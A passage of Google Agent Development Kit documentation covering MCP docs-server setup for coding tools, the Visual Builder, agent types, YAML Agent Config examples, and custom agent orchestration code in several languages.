[`uv`](https://docs.astral.sh/uv/) tool installed, as this configuration uses `uvx` to run the documentation server without manual installation. **Configuration:** 1. 
Open the MCP store via the **...** (more) menu at the top of the editor's agent panel. 1. Click on **Manage MCP Servers**. 1. Click on **View raw config**. 1. Add the following entry to `mcp_config.json` with your custom MCP server configuration. If this is your first MCP server, you can paste the entire code block: ```json { "mcpServers": { "adk-docs-mcp": { "command": "uvx", "args": [ "--from", "mcpdoc", "mcpdoc", "--urls", "AgentDevelopmentKit:https://google.github.io/adk-docs/llms.txt", "--transport", "stdio" ] } } } ``` Refer to the [Antigravity MCP documentation](https://antigravity.google/docs/mcp) for more information on managing MCP servers. **Usage:** Once configured, you can prompt the coding agent with instructions like: > Use the ADK docs to build a multi-tool agent that uses Gemini 2.5 Pro and includes a mock weather lookup tool and a custom calculator tool. Verify the agent using `adk run`. ______________________________________________________________________ ### Claude Code [Claude Code](https://code.claude.com/docs/en/overview) can be configured to query the ADK documentation by adding an [MCP server](https://code.claude.com/docs/en/mcp). **Installation:** To add an MCP server for the ADK docs to Claude Code, run the following command: ```bash claude mcp add adk-docs --transport stdio -- uvx --from mcpdoc mcpdoc --urls AgentDevelopmentKit:https://google.github.io/adk-docs/llms.txt --transport stdio ``` **Usage:** Once installed, the MCP server is automatically enabled. You can ask questions about ADK directly in Claude Code, and it will use the `llms.txt` file and ADK documentation to provide accurate answers and generate code. For example, you can ask the following question from within Claude Code: > How do I create a function tool using Agent Development Kit? 
______________________________________________________________________

### Cursor

The [Cursor](https://cursor.com/) IDE can be configured to access the ADK documentation by running a custom MCP server that points to the `llms.txt` file for ADK.

**Prerequisites:**

Ensure you have the [`uv`](https://docs.astral.sh/uv/) tool installed, as this configuration uses `uvx` to run the documentation server without manual installation.

**Configuration:**

1. Open **Cursor Settings** and navigate to the **Tools & MCP** tab.

1. Click on **New MCP Server**, which will open `mcp.json` for editing.

1. Add the following entry to `mcp.json` with your custom MCP server configuration. If this is your first MCP server, you can paste the entire code block:

   ```json
   {
     "mcpServers": {
       "adk-docs-mcp": {
         "command": "uvx",
         "args": [
           "--from",
           "mcpdoc",
           "mcpdoc",
           "--urls",
           "AgentDevelopmentKit:https://google.github.io/adk-docs/llms.txt",
           "--transport",
           "stdio"
         ]
       }
     }
   }
   ```

Refer to the [Cursor MCP documentation](https://cursor.com/docs/context/mcp) for more information on managing MCP servers.

**Usage:**

Once configured, you can prompt the coding agent with instructions like:

> Use the ADK docs to build a multi-tool agent that uses Gemini 2.5 Pro and includes a mock weather lookup tool and a custom calculator tool. Verify the agent using `adk run`.

______________________________________________________________________

### Other Tools

Any tool that supports the `llms.txt` standard or can ingest documentation from a URL can benefit from these files. You can provide the URL `https://google.github.io/adk-docs/llms.txt` (or `llms-full.txt`) to your tool's knowledge base configuration or MCP server configuration.

# Visual Builder for agents

Supported in ADK: Python v1.18.0 (Experimental)

The ADK Visual Builder is a web-based tool that provides a visual workflow design environment for creating and managing ADK agents.
It allows you to design, build, and test your agents in a beginner-friendly graphical interface, and includes an AI-powered assistant to help you build agents.

Experimental: The Visual Builder feature is an experimental release. We welcome your [feedback](https://github.com/google/adk-python/issues/new?template=feature_request.md)!

## Get started

The Visual Builder interface is part of the ADK Web tool user interface. Make sure you have the ADK library [installed](/adk-docs/get-started/installation/#python) and then run the ADK Web user interface.

```console
adk web --port 8000
```

Tip: Run from a code development directory. The Visual Builder tool writes project files to new subdirectories located in the directory where you run the ADK Web tool. Make sure you run this command from a development directory where you have write access.

**Figure 1:** ADK Web controls to start the Visual Builder tool.

To create an agent with Visual Builder:

1. In the top left of the page, select the **+** (plus sign), as shown in *Figure 1*, to start creating an agent.
1. Type a name for your agent application and select **Create**.
1. Edit your agent by doing any of the following:
   - In the left panel, edit agent component values.
   - In the central panel, add new agent components.
   - In the right panel, use prompts to modify the agent or get help.
1. In the bottom left corner, select **Save** to save your agent.
1. Interact with your new agent to test it.
1. In the top left of the page, select the pencil icon, as shown in *Figure 1*, to continue editing your agent.

Here are a few things to note when using Visual Builder:

- **Create agent and save:** When creating an agent, make sure you select **Save** before exiting the editing interface, otherwise your new agent may not be editable.
- **Agent editing:** Editing (pencil icon) is *only* available for agents created with Visual Builder.
- **Add tools:** When adding existing custom Tools to a Visual Builder agent, specify a fully-qualified Python function name.

## Workflow component support

The Visual Builder tool provides a drag-and-drop user interface for constructing agents, as well as an AI-powered development Assistant that can answer questions and edit your agent workflow. The tool supports all the essential components for building an ADK agent workflow, including:

- **Agents**
  - **Root Agent**: The primary controlling agent for a workflow. All other agents in an ADK agent workflow are considered Sub Agents.
  - [**LLM Agent:**](/adk-docs/agents/llm-agents/) An agent powered by a generative AI model.
  - [**Sequential Agent:**](/adk-docs/agents/workflow-agents/sequential-agents/) A workflow agent that executes a series of sub-agents in a sequence.
  - [**Loop Agent:**](/adk-docs/agents/workflow-agents/loop-agents/) A workflow agent that repeatedly executes a sub-agent until a certain condition is met.
  - [**Parallel Agent:**](/adk-docs/agents/workflow-agents/parallel-agents/) A workflow agent that executes multiple sub-agents concurrently.
- **Tools**
  - [**Prebuilt tools:**](/adk-docs/tools/built-in-tools/) A limited set of ADK-provided tools can be added to agents.
  - [**Custom tools:**](/adk-docs/tools-custom/) You can build and add custom tools to your workflow.
- **Components**
  - [**Callbacks:**](/adk-docs/callbacks/) A flow control component that lets you modify the behavior of agents at the start and end of agent workflow events.

Some advanced ADK features are not supported by Visual Builder due to limitations of the Agent Config feature. For more information, see the Agent Config [Known limitations](/adk-docs/agents/config/#known-limitations).
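The **Add tools** note above asks for a fully-qualified Python function name, meaning a dotted path of the form `package.module.function`. The following is a minimal sketch of how such a name maps to a callable using the standard library. It only illustrates the naming format: the helper `resolve_function` is hypothetical, and this is not a description of how Visual Builder itself loads tools.

```python
import importlib
from typing import Any, Callable


def resolve_function(qualified_name: str) -> Callable[..., Any]:
    """Resolve a dotted name such as 'package.module.function' to a callable."""
    # Split on the last dot: everything before it is the module path.
    module_path, _, func_name = qualified_name.rpartition(".")
    if not module_path:
        raise ValueError(
            f"'{qualified_name}' is not fully qualified (expected 'module.function')."
        )

    # Raises ModuleNotFoundError if the module cannot be imported.
    module = importlib.import_module(module_path)

    # Raises AttributeError if the module has no such attribute.
    func = getattr(module, func_name)
    if not callable(func):
        raise TypeError(f"'{qualified_name}' does not refer to a callable.")
    return func


if __name__ == "__main__":
    # Standard-library functions are used here so the example runs anywhere.
    sqrt = resolve_function("math.sqrt")
    print(sqrt(16.0))
```

If a name fails to resolve in a check like this, the usual causes are a missing `__init__.py` in the tools directory or running from a directory where the package is not importable.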
## Project code output

The Visual Builder tool generates code in the [Agent Config](/adk-docs/agents/config/) format, using `.yaml` configuration files for agents and Python code for custom tools. These files are generated in a subfolder of the directory where you ran the ADK Web interface. The following listing shows an example layout for a DiceAgent project:

```text
DiceAgent/
    root_agent.yaml    # main agent code
    sub_agent_1.yaml   # sub agents (if any)
    tools/             # tools directory
        __init__.py
        dice_tool.py   # tool code
```

Editing generated agents: You can edit the generated files in your development environment. However, some changes may not be compatible with Visual Builder.

## Next steps

Using the Visual Builder development Assistant, try building a new agent using this prompt:

```text
Help me add a dice roll tool to my current agent.
Use the default model if you need to configure that.
```

Check out more information on the Agent Config code format used by Visual Builder and the available options:

- [Agent Config](/adk-docs/agents/config/)
- [Agent Config YAML schema](/adk-docs/api-reference/agentconfig/)

# Agents

Supported in ADK: Python, TypeScript, Go, Java

In Agent Development Kit (ADK), an **Agent** is a self-contained execution unit designed to act autonomously to achieve specific goals. Agents can perform tasks, interact with users, utilize external tools, and coordinate with other agents.

The foundation for all agents in ADK is the `BaseAgent` class. It serves as the fundamental blueprint. To create functional agents, you typically extend `BaseAgent` in one of three main ways, catering to different needs – from intelligent reasoning to structured process control.

## Core Agent Categories

ADK provides distinct agent categories to build sophisticated applications:

1. 
[**LLM Agents (`LlmAgent`, `Agent`)**](https://google.github.io/adk-docs/agents/llm-agents/index.md): These agents utilize Large Language Models (LLMs) as their core engine to understand natural language, reason, plan, generate responses, and dynamically decide how to proceed or which tools to use, making them ideal for flexible, language-centric tasks. [Learn more about LLM Agents...](https://google.github.io/adk-docs/agents/llm-agents/index.md) 1. [**Workflow Agents (`SequentialAgent`, `ParallelAgent`, `LoopAgent`)**](https://google.github.io/adk-docs/agents/workflow-agents/index.md): These specialized agents control the execution flow of other agents in predefined, deterministic patterns (sequence, parallel, or loop) without using an LLM for the flow control itself, perfect for structured processes needing predictable execution. [Explore Workflow Agents...](https://google.github.io/adk-docs/agents/workflow-agents/index.md) 1. [**Custom Agents**](https://google.github.io/adk-docs/agents/custom-agents/index.md): Created by extending `BaseAgent` directly, these agents allow you to implement unique operational logic, specific control flows, or specialized integrations not covered by the standard types, catering to highly tailored application requirements. [Discover how to build Custom Agents...](https://google.github.io/adk-docs/agents/custom-agents/index.md) ## Choosing the Right Agent Type The following table provides a high-level comparison to help distinguish between the agent types. As you explore each type in more detail in the subsequent sections, these distinctions will become clearer. 
| Feature | LLM Agent (`LlmAgent`) | Workflow Agent | Custom Agent (`BaseAgent` subclass) | | -------------------- | --------------------------------- | ------------------------------------------- | ----------------------------------------- | | **Primary Function** | Reasoning, Generation, Tool Use | Controlling Agent Execution Flow | Implementing Unique Logic/Integrations | | **Core Engine** | Large Language Model (LLM) | Predefined Logic (Sequence, Parallel, Loop) | Custom Code | | **Determinism** | Non-deterministic (Flexible) | Deterministic (Predictable) | Can be either, based on implementation | | **Primary Use** | Language tasks, Dynamic decisions | Structured processes, Orchestration | Tailored requirements, Specific workflows | ## Agents Working Together: Multi-Agent Systems While each agent type serves a distinct purpose, the true power often comes from combining them. Complex applications frequently employ [multi-agent architectures](https://google.github.io/adk-docs/agents/multi-agents/index.md) where: - **LLM Agents** handle intelligent, language-based task execution. - **Workflow Agents** manage the overall process flow using standard patterns. - **Custom Agents** provide specialized capabilities or rules needed for unique integrations. Understanding these core types is the first step toward building sophisticated, capable AI applications with ADK. ______________________________________________________________________ ## What's Next? Now that you have an overview of the different agent types available in ADK, dive deeper into how they work and how to use them effectively: - [**LLM Agents:**](https://google.github.io/adk-docs/agents/llm-agents/index.md) Explore how to configure agents powered by large language models, including setting instructions, providing tools, and enabling advanced features like planning and code execution. 
- [**Workflow Agents:**](https://google.github.io/adk-docs/agents/workflow-agents/index.md) Learn how to orchestrate tasks using `SequentialAgent`, `ParallelAgent`, and `LoopAgent` for structured and predictable processes.
- [**Custom Agents:**](https://google.github.io/adk-docs/agents/custom-agents/index.md) Discover the principles of extending `BaseAgent` to build agents with unique logic and integrations tailored to your specific needs.
- [**Multi-Agents:**](https://google.github.io/adk-docs/agents/multi-agents/index.md) Understand how to combine different agent types to create sophisticated, collaborative systems capable of tackling complex problems.
- [**Models:**](/adk-docs/agents/models/) Learn about the different LLM integrations available and how to select the right model for your agents.

# Build agents with Agent Config

Supported in ADK: Python v1.11.0 (Experimental)

The ADK Agent Config feature lets you build an ADK workflow without writing code. An Agent Config uses a YAML format text file with a brief description of the agent, allowing just about anyone to assemble and run an ADK agent. The following is a simple example of a basic Agent Config definition:

```text
name: assistant_agent
model: gemini-2.5-flash
description: A helper agent that can answer users' questions.
instruction: You are an agent to help answer users' various questions.
```

You can use Agent Config files to build more complex agents which can incorporate Functions, Tools, Sub-Agents, and more. This page describes how to build and run ADK workflows with the Agent Config feature. For detailed information on the syntax and settings supported by the Agent Config format, see the [Agent Config syntax reference](/adk-docs/api-reference/agentconfig/).

Experimental: The Agent Config feature is experimental and has some [known limitations](#known-limitations). We welcome your [feedback](https://github.com/google/adk-python/issues/new?template=feature_request.md&labels=agent%20config)!
## Get started

This section describes how to set up and start building agents with the ADK and the Agent Config feature, including installation setup, building an agent, and running your agent.

### Setup

You need to install the Google Agent Development Kit libraries and provide an access key for a generative AI model such as the Gemini API. This section provides details on what you must install and configure before you can run agents with Agent Config files.

Note: The Agent Config feature currently only supports Gemini models. For more information about additional functional restrictions, see [Known limitations](#known-limitations).

To set up ADK for use with Agent Config:

1. Install the ADK Python libraries by following the [Installation](/adk-docs/get-started/installation/#python) instructions. *Python is currently required.* For more information, see the [Known limitations](#known-limitations).

1. Verify that ADK is installed by running the following command in your terminal:

   ```text
   adk --version
   ```

   This command should show the ADK version you have installed.

Tip: If the `adk` command fails to run and the version is not listed in step 2, make sure your Python environment is active. Execute `source .venv/bin/activate` in your terminal on Mac and Linux. For other platform commands, see the [Installation](/adk-docs/get-started/installation/#python) page.

### Build an agent

You build an agent with Agent Config by using the `adk create` command to create the project files for an agent, and then editing the `root_agent.yaml` file it generates for you.

To create an ADK project for use with Agent Config:

1. In your terminal window, run the following command to create a config-based agent:

   ```text
   adk create --type=config my_agent
   ```

   This command generates a `my_agent/` folder, containing a `root_agent.yaml` file and an `.env` file.

1. In the `my_agent/.env` file, set environment variables for your agent to access generative AI models and other services:

   1. For Gemini model access through Google API, add a line to the file with your API key:

      ```text
      GOOGLE_GENAI_USE_VERTEXAI=0
      GOOGLE_API_KEY=
      ```

      You can get an API key from the Google AI Studio [API Keys](https://aistudio.google.com/app/apikey) page.

   1. For Gemini model access through Google Cloud, add these lines to the file:

      ```text
      GOOGLE_GENAI_USE_VERTEXAI=1
      GOOGLE_CLOUD_PROJECT=
      GOOGLE_CLOUD_LOCATION=us-central1
      ```

      For information on creating a Cloud Project, see the Google Cloud docs for [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects).

1. Using a text editor, edit the Agent Config file `my_agent/root_agent.yaml`, as shown below:

   ```text
   # yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json
   name: assistant_agent
   model: gemini-2.5-flash
   description: A helper agent that can answer users' questions.
   instruction: You are an agent to help answer users' various questions.
   ```

You can discover more configuration options for your `root_agent.yaml` agent configuration file by referring to the ADK [samples repository](https://github.com/search?q=repo%3Agoogle%2Fadk-python+path%3A%2F%5Econtributing%5C%2Fsamples%5C%2F%2F+.yaml&type=code) or the [Agent Config syntax](/adk-docs/api-reference/agentconfig/) reference.

### Run the agent

Once you have completed editing your Agent Config, you can run your agent using the web interface, command line terminal execution, or API server mode.

To run your Agent Config-defined agent:

1. In your terminal, navigate to the `my_agent/` directory containing the `root_agent.yaml` file.
1. Type one of the following commands to run your agent:
   - `adk web` - Run the web UI for your agent.
   - `adk run` - Run your agent in the terminal without a user interface.
   - `adk api_server` - Run your agent as a service that can be used by other applications.
For more information on the ways to run your agent, see the *Run Your Agent* topic in the [Quickstart](/adk-docs/get-started/quickstart/#run-your-agent). For more information about the ADK command line options, see the [ADK CLI reference](/adk-docs/api-reference/cli/).

## Example configs

This section shows examples of Agent Config files to get you started building agents. For additional and more complete examples, see the ADK [samples repository](https://github.com/search?q=repo%3Agoogle%2Fadk-python+path%3A%2F%5Econtributing%5C%2Fsamples%5C%2F%2F+root_agent.yaml&type=code).

### Built-in tool example

The following example uses the built-in ADK `google_search` tool to give the agent Google Search functionality. This agent automatically uses the search tool to reply to user requests.

```text
# yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json
name: search_agent
model: gemini-2.0-flash
description: 'an agent whose job it is to perform Google search queries and answer questions about the results.'
instruction: You are an agent whose job is to perform Google search queries and answer questions about the results.
tools:
  - name: google_search
```

For more details, see the full code for this sample in the [ADK sample repository](https://github.com/google/adk-python/blob/main/contributing/samples/tool_builtin_config/root_agent.yaml).

### Custom tool example

The following example uses a custom tool built with Python code and listed in the `tools:` section of the config file. The agent uses this tool to check whether the numbers in a list provided by the user are prime.

```text
# yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json
agent_class: LlmAgent
model: gemini-2.5-flash
name: prime_agent
description: Handles checking if numbers are prime.
instruction: |
  You are responsible for checking whether numbers are prime.
  When asked to check primes, you must call the check_prime tool with a list of integers.
  Never attempt to determine prime numbers manually.
  Return the prime number results to the root agent.
tools:
  - name: ma_llm.check_prime
```

For more details, see the full code for this sample in the [ADK sample repository](https://github.com/google/adk-python/blob/main/contributing/samples/multi_agent_llm_config/prime_agent.yaml).

### Sub-agents example

The following example shows an agent defined with two sub-agents in the `sub_agents:` section, and an example tool in the `tools:` section of the config file. This agent determines what the user wants, and delegates to one of the sub-agents to resolve the request. The sub-agents are defined using Agent Config YAML files.

```text
# yaml-language-server: $schema=https://raw.githubusercontent.com/google/adk-python/refs/heads/main/src/google/adk/agents/config_schemas/AgentConfig.json
agent_class: LlmAgent
model: gemini-2.5-flash
name: root_agent
description: Learning assistant that provides tutoring in code and math.
instruction: |
  You are a learning assistant that helps students with coding and math questions.
  You delegate coding questions to the code_tutor_agent and math questions to the math_tutor_agent.
  Follow these steps:
  1. If the user asks about programming or coding, delegate to the code_tutor_agent.
  2. If the user asks about math concepts or problems, delegate to the math_tutor_agent.
  3. Always provide clear explanations and encourage learning.
sub_agents:
  - config_path: code_tutor_agent.yaml
  - config_path: math_tutor_agent.yaml
```

For more details, see the full code for this sample in the [ADK sample repository](https://github.com/google/adk-python/blob/main/contributing/samples/multi_agent_basic_config/root_agent.yaml).
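
For the custom tool example earlier in this section, the `ma_llm.check_prime` entry refers to a Python function by its module path. The sketch below shows one way such a function could look. The signature, the return text, and the idea that it lives in a package named `ma_llm` are assumptions made for illustration; they are not taken from the sample repository.

```python
import math


def check_prime(nums: list[int]) -> str:
    """Report which of the given integers are prime.

    Hypothetical tool body: the name matches the `ma_llm.check_prime`
    reference in the config, but the signature and wording are assumptions.
    """
    primes = []
    for n in nums:
        if n < 2:
            continue  # 0, 1, and negative numbers are not prime
        # Trial division up to the integer square root finds any factor
        if all(n % d != 0 for d in range(2, math.isqrt(n) + 1)):
            primes.append(n)
    if not primes:
        return "No prime numbers found."
    return ", ".join(str(p) for p in primes) + " are prime numbers."


if __name__ == "__main__":
    print(check_prime([2, 9, 17, 21]))
```

Returning a plain string keeps the result easy for the model to relay to the user. A structured return value such as a dictionary would be an equally reasonable choice.
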
## Deploy agent configs

You can deploy Agent Config agents with [Cloud Run](/adk-docs/deploy/cloud-run/) and [Agent Engine](/adk-docs/deploy/agent-engine/), using the same procedure as code-based agents. For more information on how to prepare and deploy Agent Config-based agents, see the [Cloud Run](/adk-docs/deploy/cloud-run/) and [Agent Engine](/adk-docs/deploy/agent-engine/) deployment guides.

## Known limitations

The Agent Config feature is experimental and includes the following limitations:

- **Model support:** Only Gemini models are currently supported. Integration with third-party models is in progress.
- **Programming language:** The Agent Config feature currently supports only Python code for tools and other functionality requiring programming code.
- **ADK Tool support:** The following ADK tools are supported by the Agent Config feature, but *not all tools are fully supported*:
  - `google_search`
  - `load_artifacts`
  - `url_context`
  - `exit_loop`
  - `preload_memory`
  - `get_user_choice`
  - `enterprise_web_search`
  - `load_web_page`: Requires a fully-qualified path to access web pages.
- **Agent Type Support:** The `LangGraphAgent` and `A2aAgent` types are not yet supported.
  - `AgentTool`
  - `LongRunningFunctionTool`
  - `VertexAiSearchTool`
  - `McpToolset`
  - `ExampleTool`

## Next steps

For ideas on how and what to build with ADK Agent Configs, see the YAML-based agent definitions in the ADK [adk-samples](https://github.com/search?q=repo:google/adk-python+path:/%5Econtributing%5C/samples%5C//+root_agent.yaml&type=code) repository. For detailed information on the syntax and settings supported by the Agent Config format, see the [Agent Config syntax reference](/adk-docs/api-reference/agentconfig/).

# Custom agents

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

Custom agents provide the ultimate flexibility in ADK, allowing you to define **arbitrary orchestration logic** by inheriting directly from `BaseAgent` and implementing your own control flow.
This goes beyond the predefined patterns of `SequentialAgent`, `LoopAgent`, and `ParallelAgent`, enabling you to build highly specific and complex agentic workflows.

**Advanced Concept:** Building custom agents by directly implementing `_run_async_impl` (or its equivalent in other languages) provides powerful control but is more complex than using the predefined `LlmAgent` or standard `WorkflowAgent` types. We recommend understanding those foundational agent types before tackling custom orchestration logic.

## Introduction: Beyond Predefined Workflows

### What is a Custom Agent?

A Custom Agent is essentially any class you create that inherits from `google.adk.agents.BaseAgent` and implements its core execution logic within the `_run_async_impl` asynchronous method. You have complete control over how this method calls other agents (sub-agents), manages state, and handles events.

**Note:** The specific method name for implementing an agent's core asynchronous logic may vary slightly by SDK language (e.g., `runAsyncImpl` in Java, `_run_async_impl` in Python, or `runAsyncImpl` in TypeScript). Refer to the language-specific API documentation for details.

### Why Use Them?

While the standard [Workflow Agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md) (`SequentialAgent`, `LoopAgent`, `ParallelAgent`) cover common orchestration patterns, you'll need a custom agent when your requirements include:

- **Conditional Logic:** Executing different sub-agents or taking different paths based on runtime conditions or the results of previous steps.
- **Complex State Management:** Implementing intricate logic for maintaining and updating state throughout the workflow beyond simple sequential passing.
- **External Integrations:** Incorporating calls to external APIs, databases, or custom libraries directly within the orchestration flow control.
- **Dynamic Agent Selection:** Choosing which sub-agent(s) to run next based on dynamic evaluation of the situation or input.
- **Unique Workflow Patterns:** Implementing orchestration logic that doesn't fit the standard sequential, parallel, or loop structures.

## Implementing Custom Logic

The core of any custom agent is the method where you define its unique asynchronous behavior. This method allows you to orchestrate sub-agents and manage the flow of execution.

In Python, the heart of any custom agent is the `_run_async_impl` method. This is where you define its unique behavior.

- **Signature:** `async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]:`
- **Asynchronous Generator:** It must be an `async def` function and return an `AsyncGenerator`. This allows it to `yield` events produced by sub-agents or its own logic back to the runner.
- **`ctx` (InvocationContext):** Provides access to crucial runtime information, most importantly `ctx.session.state`, which is the primary way to share data between steps orchestrated by your custom agent.

In TypeScript, the heart of any custom agent is the `runAsyncImpl` method. This is where you define its unique behavior.

- **Signature:** `async* runAsyncImpl(ctx: InvocationContext): AsyncGenerator`
- **Asynchronous Generator:** It must be an `async` generator function (`async*`).
- **`ctx` (InvocationContext):** Provides access to crucial runtime information, most importantly `ctx.session.state`, which is the primary way to share data between steps orchestrated by your custom agent.

In Go, you implement the `Run` method as part of a struct that satisfies the `agent.Agent` interface. The actual logic is typically a method on your custom agent struct.

- **Signature:** `Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error]`
- **Iterator:** The `Run` method returns an iterator (`iter.Seq2`) that yields events and errors. This is the standard way to handle streaming results from an agent's execution.
- **`ctx` (InvocationContext):** The `agent.InvocationContext` provides access to the session, including state, and other crucial runtime information.
- **Session State:** You can access the session state through `ctx.Session().State()`.

In Java, the heart of any custom agent is the `runAsyncImpl` method, which you override from `BaseAgent`.

- **Signature:** `protected Flowable<Event> runAsyncImpl(InvocationContext ctx)`
- **Reactive Stream (`Flowable`):** It must return an `io.reactivex.rxjava3.core.Flowable`. This `Flowable` represents a stream of events that will be produced by the custom agent's logic, often by combining or transforming multiple `Flowable`s from sub-agents.
- **`ctx` (InvocationContext):** Provides access to crucial runtime information, most importantly `ctx.session().state()`, which is a `java.util.concurrent.ConcurrentMap`. This is the primary way to share data between steps orchestrated by your custom agent.

**Key Capabilities within the Core Asynchronous Method:**

In Python:

1. **Calling Sub-Agents:** You invoke sub-agents (which are typically stored as instance attributes like `self.my_llm_agent`) using their `run_async` method and yield their events:

   ```python
   async for event in self.some_sub_agent.run_async(ctx):
       # Optionally inspect or log the event
       yield event  # Pass the event up
   ```

1. **Managing State:** Read from and write to the session state dictionary (`ctx.session.state`) to pass data between sub-agent calls or make decisions:

   ```python
   # Read data set by a previous agent
   previous_result = ctx.session.state.get("some_key")

   # Make a decision based on state
   if previous_result == "some_value":
       # ... call a specific sub-agent ...
   else:
       # ... call another sub-agent ...

   # Store a result for a later step (often done via a sub-agent's output_key)
   # ctx.session.state["my_custom_result"] = "calculated_value"
   ```

1. **Implementing Control Flow:** Use standard Python constructs (`if`/`elif`/`else`, `for`/`while` loops, `try`/`except`) to create sophisticated, conditional, or iterative workflows involving your sub-agents.

In TypeScript:

1. **Calling Sub-Agents:** You invoke sub-agents (which are typically stored as instance properties like `this.myLlmAgent`) using their `runAsync` method and yield their events:

   ```typescript
   for await (const event of this.someSubAgent.runAsync(ctx)) {
     // Optionally inspect or log the event
     yield event; // Pass the event up to the runner
   }
   ```

1. **Managing State:** Read from and write to the session state object (`ctx.session.state`) to pass data between sub-agent calls or make decisions:

   ```typescript
   // Read data set by a previous agent
   const previousResult = ctx.session.state['some_key'];

   // Make a decision based on state
   if (previousResult === 'some_value') {
     // ... call a specific sub-agent ...
   } else {
     // ... call another sub-agent ...
   }

   // Store a result for a later step (often done via a sub-agent's outputKey)
   // ctx.session.state['my_custom_result'] = 'calculated_value';
   ```

1. **Implementing Control Flow:** Use standard TypeScript/JavaScript constructs (`if`/`else`, `for`/`while` loops, `try`/`catch`) to create sophisticated, conditional, or iterative workflows involving your sub-agents.

In Go:

1. **Calling Sub-Agents:** You invoke sub-agents by calling their `Run` method.

   ```go
   // Example: Running one sub-agent and yielding its events
   for event, err := range someSubAgent.Run(ctx) {
       if err != nil {
           // Handle or propagate the error
           return
       }
       // Yield the event up to the caller
       if !yield(event, nil) {
           return
       }
   }
   ```

1. **Managing State:** Read from and write to the session state to pass data between sub-agent calls or make decisions.

   ```go
   // The `ctx` (`agent.InvocationContext`) is passed directly to your agent's `Run` function.
   // Read data set by a previous agent
   previousResult, err := ctx.Session().State().Get("some_key")
   if err != nil {
       // Handle cases where the key might not exist yet
   }

   // Make a decision based on state
   if val, ok := previousResult.(string); ok && val == "some_value" {
       // ... call a specific sub-agent ...
   } else {
       // ... call another sub-agent ...
   }

   // Store a result for a later step
   if err := ctx.Session().State().Set("my_custom_result", "calculated_value"); err != nil {
       // Handle error
   }
   ```

1. **Implementing Control Flow:** Use standard Go constructs (`if`/`else`, `switch`, `for` loops, goroutines, channels) to create sophisticated, conditional, or iterative workflows involving your sub-agents.

In Java:

1. **Calling Sub-Agents:** You invoke sub-agents (which are typically stored as instance attributes or objects) using their asynchronous run method and return their event streams. You typically chain `Flowable`s from sub-agents using RxJava operators like `concatWith`, `flatMapPublisher`, or `concatArray`.

   ```java
   // Example: Running one sub-agent
   // return someSubAgent.runAsync(ctx);

   // Example: Running sub-agents sequentially
   Flowable<Event> firstAgentEvents = someSubAgent1.runAsync(ctx)
       .doOnNext(event -> System.out.println("Event from agent 1: " + event.id()));

   Flowable<Event> secondAgentEvents = Flowable.defer(() ->
       someSubAgent2.runAsync(ctx)
           .doOnNext(event -> System.out.println("Event from agent 2: " + event.id()))
   );

   return firstAgentEvents.concatWith(secondAgentEvents);
   ```

   `Flowable.defer()` is often used for subsequent stages if their execution depends on the completion or state after prior stages.

1. **Managing State:** Read from and write to the session state to pass data between sub-agent calls or make decisions. The session state is a `java.util.concurrent.ConcurrentMap` obtained via `ctx.session().state()`.
   ```java
   // Read data set by a previous agent
   Object previousResult = ctx.session().state().get("some_key");

   // Make a decision based on state
   if ("some_value".equals(previousResult)) {
       // ... logic to include a specific sub-agent's Flowable ...
   } else {
       // ... logic to include another sub-agent's Flowable ...
   }

   // Store a result for a later step (often done via a sub-agent's outputKey)
   // ctx.session().state().put("my_custom_result", "calculated_value");
   ```

1. **Implementing Control Flow:** Use standard language constructs (`if`/`else`, loops, `try`/`catch`) combined with reactive operators (RxJava) to create sophisticated workflows.

   - **Conditional:** `Flowable.defer()` to choose which `Flowable` to subscribe to based on a condition, or `filter()` if you're filtering events within a stream.
   - **Iterative:** Operators like `repeat()`, `retry()`, or by structuring your `Flowable` chain to recursively call parts of itself based on conditions (often managed with `flatMapPublisher` or `concatMap`).

## Managing Sub-Agents and State

Typically, a custom agent orchestrates other agents (like `LlmAgent`, `LoopAgent`, etc.).

- **Initialization:** You usually pass instances of these sub-agents into your custom agent's constructor and store them as instance fields/attributes (e.g., `this.story_generator = story_generator_instance` or `self.story_generator = story_generator_instance`). This makes them accessible within the custom agent's core asynchronous execution logic (such as the `_run_async_impl` method).
- **Sub Agents List:** When initializing the `BaseAgent` using its `super()` constructor, you should pass a `sub_agents` list. This list tells the ADK framework about the agents that are part of this custom agent's immediate hierarchy. It's important for framework features like lifecycle management, introspection, and potentially future routing capabilities, even if your core execution logic (`_run_async_impl`) calls the agents directly via `self.xxx_agent`.
  Include the agents that your custom logic directly invokes at the top level.
- **State:** As mentioned, `ctx.session.state` is the standard way sub-agents (especially `LlmAgent`s using `output_key`) communicate results back to the orchestrator and how the orchestrator passes necessary inputs down.

## Design Pattern Example: `StoryFlowAgent`

Let's illustrate the power of custom agents with an example pattern: a multi-stage content generation workflow with conditional logic.

**Goal:** Create a system that generates a story, iteratively refines it through critique and revision, performs final checks, and crucially, *regenerates the story if the final tone check fails*.

**Why Custom?** The core requirement driving the need for a custom agent here is the **conditional regeneration based on the tone check**. Standard workflow agents don't have built-in conditional branching based on the outcome of a sub-agent's task. We need custom logic (`if tone == "negative": ...`) within the orchestrator.

______________________________________________________________________

### Part 1: Simplified Custom Agent Initialization

In Python, we define the `StoryFlowAgent` by inheriting from `BaseAgent`. In `__init__`, we store the necessary sub-agents (passed in) as instance attributes and tell the `BaseAgent` framework about the top-level agents this custom agent will directly orchestrate.

```python
class StoryFlowAgent(BaseAgent):
    """
    Custom agent for a story generation and refinement workflow.

    This agent orchestrates a sequence of LLM agents to generate a story,
    critique it, revise it, check grammar and tone, and potentially
    regenerate the story if the tone is negative.
    """

    # --- Field Declarations for Pydantic ---
    # Declare the agents passed during initialization as class attributes with type hints
    story_generator: LlmAgent
    critic: LlmAgent
    reviser: LlmAgent
    grammar_check: LlmAgent
    tone_check: LlmAgent

    loop_agent: LoopAgent
    sequential_agent: SequentialAgent

    # model_config allows setting Pydantic configurations if needed, e.g., arbitrary_types_allowed
    model_config = {"arbitrary_types_allowed": True}

